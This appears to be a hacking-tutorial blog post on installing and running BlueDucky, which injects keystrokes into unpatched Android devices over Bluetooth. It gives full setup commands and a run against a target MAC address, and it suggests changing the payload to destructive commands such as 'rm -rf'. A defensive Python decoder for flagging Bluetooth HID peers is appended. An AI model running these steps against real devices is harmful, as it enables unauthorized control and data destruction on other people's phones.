Bluetooth Hacking: Sending Commands to a Bluetooth Device using BlueDucky

Welcome back Cyberwarriors!

Bluetooth is a widely used protocol that enables communication between devices that are nearby or within a piconet, like speakers, headphones, and mobile phones. If a hacker manages to exploit Bluetooth, they could potentially gain control over or listen in on any of these devices.

Bluetooth devices fall into several categories, and each device announces its category to the connecting device in a banner. Earlier Bluetooth tutorials covered the HID class, arguably the most significant class for exploiting Bluetooth devices. Human Interface Devices (HID) include Bluetooth mice and keyboards, and devices in this class are permitted to send the input events that keyboards and mice need in order to work.

In 2023, a new Bluetooth vulnerability surfaced that potentially allows an unauthenticated HID device to establish an encrypted connection. If successful, the HID device could inject commands into the connected device. This exploit affects unpatched Android 11 and later devices, as well as any Android 10 and earlier devices, for which no patches are available. A proof of concept (PoC) was unveiled in January 2024 and has since been incorporated into a new tool called BlueDucky.

Let's delve into this tool and explore its capabilities.

Step # 1 Download and Install BlueDucky

To install BlueDucky, we need to do a few things to get our system ready.

First, update your apt cache.

kali > sudo apt update

Next, install the necessary dependencies from the Kali repository.

kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus

We now need to get pybluez (the PyBluez Python bindings) from github.com.

kali > git clone https://github.com/pybluez/pybluez.git

Now, move into the new directory, pybluez.

kali > cd pybluez

We now need to run the setup script for pybluez.

kali > python3 setup.py install

Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.

kali > cd ~

kali > git clone --depth=1 https://github.com/bluez/bluez.git

kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth

Now, let's copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it in our script from anywhere (/usr/local/bin is in the Linux $PATH variable).

kali > sudo cp bdaddr /usr/local/bin

Finally, we should download BlueDucky from github.

kali > git clone https://github.com/pentestfunctions/BlueDucky.git

kali > cd BlueDucky

kali > sudo hciconfig hci0 up

Step # 2 Run BlueDucky

Now that we've installed all the necessary components to execute BlueDucky, let's give it a try. If you're running it from a system with an external plug-in Bluetooth adapter, like I am, you'll probably need to make a minor adjustment to the Python script. By default, BlueDucky scans for Bluetooth devices using hci0. However, if you've added an external Bluetooth device, it might be recognized as hci1 instead. You can easily fix this by opening the script in your preferred text editor and changing the default value to hci1. In my case, I used the default GUI text editor in Kali, which is mousepad.

kali > sudo mousepad BlueDucky.py

Now, go ahead and save this file. Make certain to give yourself execute permissions.

kali > sudo chmod 755 BlueDucky.py

Now, it's a good idea to double-check that your Bluetooth adapter is powered on and activated.

kali > sudo hciconfig hci1 up

If your adapter is up and running, it's time to start BlueDucky!

kali > sudo python3 BlueDucky.py

If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.

At this point, you can select "yes" and enter the MAC address of the target device.

When you do so, BlueDucky will run through the requisite commands to compromise the device and, if successful, will inject the string "hello there 123" into the target device.

Summary

Bluetooth-enabled devices are ubiquitous in our daily lives, ranging from phones and tablets to speakers, headsets, keyboards, and various other gadgets. Before pairing with another device, Bluetooth devices disclose their device type, known as the device class. However, this class declaration can be manipulated by an attacker to inject commands into the device.

BlueDucky is an automated tool designed to exploit this vulnerability. While the tool initially sends a harmless message to the target device, it can be easily modified to transmit malicious commands such as "shutdown" or "rm -rf" to the target device.
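Both the introduction and the summary turn on the device class a peer announces before pairing. The added example below is my own code, not part of the original post or of BlueDucky: it decodes the 24-bit Bluetooth Class of Device (CoD) field and flags peers that declare themselves as HID peripherals, which is what a defender would want to review in a list of paired or nearby devices. The scan records at the bottom are constructed sample data.

```python
"""Decode a Bluetooth Class of Device (CoD) value and flag HID peripherals."""

# Major device class lives in bits 8-12 of the CoD (Bluetooth Assigned Numbers).
MAJOR_DEVICE_CLASS = {
    0x00: "miscellaneous", 0x01: "computer", 0x02: "phone",
    0x03: "lan/network access point", 0x04: "audio/video", 0x05: "peripheral",
    0x06: "imaging", 0x07: "wearable", 0x08: "toy", 0x09: "health",
    0x1F: "uncategorized",
}
# Major service class flags live in bits 13-23.
MAJOR_SERVICE_BITS = {
    13: "limited discoverable", 16: "positioning", 17: "networking",
    18: "rendering", 19: "capturing", 20: "object transfer", 21: "audio",
    22: "telephony", 23: "information",
}
# For the peripheral major class, CoD bits 6-7 say what kind of input device it is.
PERIPHERAL_INPUT = {0: "none", 1: "keyboard", 2: "pointing device",
                    3: "keyboard/pointing combo"}


def parse_cod(cod: int) -> dict:
    """Split a CoD integer into major class, minor class, services and HID type."""
    if not 0 <= cod <= 0xFFFFFF or cod & 0b11:
        # Format type (bits 0-1) must be 00 in every CoD defined so far.
        raise ValueError(f"invalid CoD {cod:#08x}")
    minor = (cod >> 2) & 0x3F
    major = (cod >> 8) & 0x1F
    services = [name for bit, name in MAJOR_SERVICE_BITS.items() if cod & (1 << bit)]
    info = {"major": MAJOR_DEVICE_CLASS.get(major, f"reserved({major:#x})"),
            "minor": minor, "services": services, "hid": None}
    if major == 0x05:
        info["hid"] = PERIPHERAL_INPUT[(minor >> 4) & 0b11]
    return info


def is_hid(cod: int) -> bool:
    """True when the peer announces itself in the peripheral (HID) major class."""
    return parse_cod(cod)["major"] == "peripheral"


def hid_peers(records):
    """Return (address, hid type) for every record whose CoD is a HID peripheral."""
    return [(addr, parse_cod(cod)["hid"]) for addr, cod in records if is_hid(cod)]


# Constructed sample scan: (address, CoD) pairs, not real devices.
SAMPLE_SCAN = [
    ("AA:BB:CC:00:00:01", 0x5A020C),  # smartphone
    ("AA:BB:CC:00:00:02", 0x002540),  # keyboard
    ("AA:BB:CC:00:00:03", 0x240404),  # wearable headset
    ("AA:BB:CC:00:00:04", 0x002580),  # mouse
]

if __name__ == "__main__":
    for addr, kind in hid_peers(SAMPLE_SCAN):
        print(f"{addr} announces HID type: {kind}")
```

Run against a real adapter, the same decoder can be fed the class value that bluetoothctl or hcitool reports for each peer, so that any keyboard or pointing device that you did not pair yourself stands out.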